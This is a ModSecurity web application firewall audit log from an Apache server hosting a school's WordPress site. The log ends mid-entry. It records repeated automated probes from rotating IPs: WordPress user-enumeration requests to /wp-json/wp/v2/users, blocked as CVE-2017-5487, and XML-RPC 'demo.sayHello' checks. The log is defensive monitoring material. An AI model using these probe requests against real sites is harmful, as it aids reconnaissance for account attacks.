ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --835b117a-Z-- --f676dd4c-A-- [05/May/2025:23:59:30 +0700] aBjucgRwKNFSM6B7_LamuwAAAII 103.236.140.4 45790 103.236.140.4 8181 --f676dd4c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f676dd4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f676dd4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746464370222470 2640 (- - -) Stopwatch2: 1746464370222470 2640; combined=1416, p1=463, p2=919, p3=0, p4=0, p5=33, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f676dd4c-Z-- --9204a72f-A-- [05/May/2025:23:59:33 +0700] aBjudQRwKNFSM6B7_LamvgAAAJA 103.236.140.4 45826 103.236.140.4 8181 --9204a72f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9204a72f-C-- demo.sayHello --9204a72f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9204a72f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746464373278870 5706 (- - -) Stopwatch2: 1746464373278870 5706; combined=4271, p1=539, p2=3402, p3=32, p4=35, p5=146, sr=73, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9204a72f-Z-- --10855341-A-- [06/May/2025:00:03:23 +0700] aBjvW_ZJDMuQndL03JNlfwAAAEk 103.236.140.4 47962 103.236.140.4 8181 --10855341-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --10855341-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10855341-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746464603085235 3386 (- - -) Stopwatch2: 1746464603085235 3386; combined=1471, p1=482, p2=957, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10855341-Z-- --e7f02a2a-A-- [06/May/2025:00:03:26 +0700] aBjvXvZJDMuQndL03JNlgAAAAFA 103.236.140.4 47990 103.236.140.4 8181 --e7f02a2a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e7f02a2a-C-- demo.sayHello --e7f02a2a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7f02a2a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746464606292265 5319 (- - -) Stopwatch2: 1746464606292265 5319; combined=4258, p1=517, p2=3487, p3=34, p4=36, p5=107, sr=75, sw=77, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7f02a2a-Z-- --b562fd2d-A-- [06/May/2025:00:11:13 +0700] aBjxMU2V_h1VFAgsfgaGZgAAAAE 103.236.140.4 51570 103.236.140.4 8181 --b562fd2d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.158 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b562fd2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b562fd2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465073231180 2178 (- - -) Stopwatch2: 1746465073231180 2178; combined=1204, p1=403, p2=770, p3=0, p4=0, p5=30, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b562fd2d-Z-- --e553926e-A-- [06/May/2025:00:11:15 +0700] aBjxM02V_h1VFAgsfgaGbAAAABA 103.236.140.4 51594 103.236.140.4 8181 --e553926e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.158 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e553926e-C-- demo.sayHello --e553926e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e553926e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465075968272 5729 (- - -) Stopwatch2: 1746465075968272 5729; combined=4230, p1=513, p2=3486, p3=33, p4=34, p5=97, sr=73, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e553926e-Z-- --fe6a5842-A-- [06/May/2025:00:11:50 +0700] aBjxVoZWvR7-42f6JrAUjAAAAM4 103.236.140.4 51912 103.236.140.4 8181 --fe6a5842-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fe6a5842-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe6a5842-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465110779036 2769 (- - -) Stopwatch2: 1746465110779036 2769; combined=1174, p1=385, p2=755, p3=0, p4=0, p5=33, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe6a5842-Z-- --ddee590b-A-- [06/May/2025:00:11:53 +0700] aBjxWU2V_h1VFAgsfgaGpAAAAAk 103.236.140.4 51936 103.236.140.4 8181 --ddee590b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.5 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ddee590b-C-- demo.sayHello --ddee590b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ddee590b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465113498061 5228 (- - -) Stopwatch2: 1746465113498061 5228; combined=4249, p1=514, p2=3516, p3=33, p4=34, p5=91, sr=72, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ddee590b-Z-- --9bb5990c-A-- [06/May/2025:00:12:02 +0700] aBjxYgRwKNFSM6B7_LaoQgAAAII 103.236.140.4 52008 103.236.140.4 8181 --9bb5990c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.88 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9bb5990c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bb5990c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465122776929 2532 (- - -) Stopwatch2: 1746465122776929 2532; combined=1103, p1=503, p2=576, p3=0, p4=0, p5=24, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bb5990c-Z-- --04397672-A-- [06/May/2025:00:12:05 +0700] aBjxZU2V_h1VFAgsfgaGtwAAABM 103.236.140.4 52032 103.236.140.4 8181 --04397672-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.88 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --04397672-C-- demo.sayHello --04397672-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --04397672-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465125572124 5722 (- - -) Stopwatch2: 1746465125572124 5722; combined=4294, p1=558, p2=3514, p3=32, p4=36, p5=92, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04397672-Z-- --eb7d345f-A-- [06/May/2025:00:12:24 +0700] aBjxePZJDMuQndL03JNmigAAAEE 103.236.140.4 52242 103.236.140.4 8181 --eb7d345f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eb7d345f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb7d345f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465144087943 2750 (- - -) Stopwatch2: 1746465144087943 2750; combined=1239, p1=427, p2=782, p3=0, p4=0, p5=30, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb7d345f-Z-- --7b9d977b-A-- [06/May/2025:00:12:30 +0700] aBjxfk2V_h1VFAgsfgaG0wAAAAY 103.236.140.4 52296 103.236.140.4 8181 --7b9d977b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7b9d977b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b9d977b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465150637346 2532 (- - -) Stopwatch2: 1746465150637346 2532; combined=1203, p1=403, p2=770, p3=0, p4=0, p5=29, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b9d977b-Z-- --43ab941c-A-- [06/May/2025:00:12:33 +0700] aBjxgU2V_h1VFAgsfgaG2QAAAA4 103.236.140.4 52332 103.236.140.4 8181 --43ab941c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.151 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --43ab941c-C-- demo.sayHello --43ab941c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --43ab941c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465153734921 5475 (- - -) Stopwatch2: 1746465153734921 5475; combined=4328, p1=566, p2=3512, p3=37, p4=35, p5=104, sr=72, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43ab941c-Z-- --928b0d72-A-- [06/May/2025:00:12:35 +0700] aBjxg02V_h1VFAgsfgaG3gAAABM 103.236.140.4 52348 103.236.140.4 8181 --928b0d72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --928b0d72-C-- demo.sayHello --928b0d72-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --928b0d72-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465155693174 18510 (- - -) Stopwatch2: 1746465155693174 18510; combined=30037, p1=520, p2=3474, p3=32, p4=35, p5=13005, sr=73, sw=67, l=0, gc=12904 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --928b0d72-Z-- --f61ba81c-A-- [06/May/2025:00:12:36 +0700] aBjxhE2V_h1VFAgsfgaG4AAAAAs 103.236.140.4 52354 103.236.140.4 8181 --f61ba81c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.255 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f61ba81c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f61ba81c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465156543645 2504 (- - -) Stopwatch2: 1746465156543645 2504; combined=1172, p1=388, p2=754, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f61ba81c-Z-- --57e7623c-A-- [06/May/2025:00:12:39 +0700] aBjxh02V_h1VFAgsfgaG5gAAAA4 103.236.140.4 52384 103.236.140.4 8181 --57e7623c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.255 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --57e7623c-C-- demo.sayHello --57e7623c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --57e7623c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465159264247 4466 (- - -) Stopwatch2: 1746465159264247 4466; combined=3179, p1=409, p2=2595, p3=28, p4=30, p5=69, sr=57, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57e7623c-Z-- --5ac9eb39-A-- [06/May/2025:00:12:41 +0700] aBjxiYZWvR7-42f6JrAUnAAAAMo 103.236.140.4 52420 103.236.140.4 8181 --5ac9eb39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5ac9eb39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ac9eb39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri 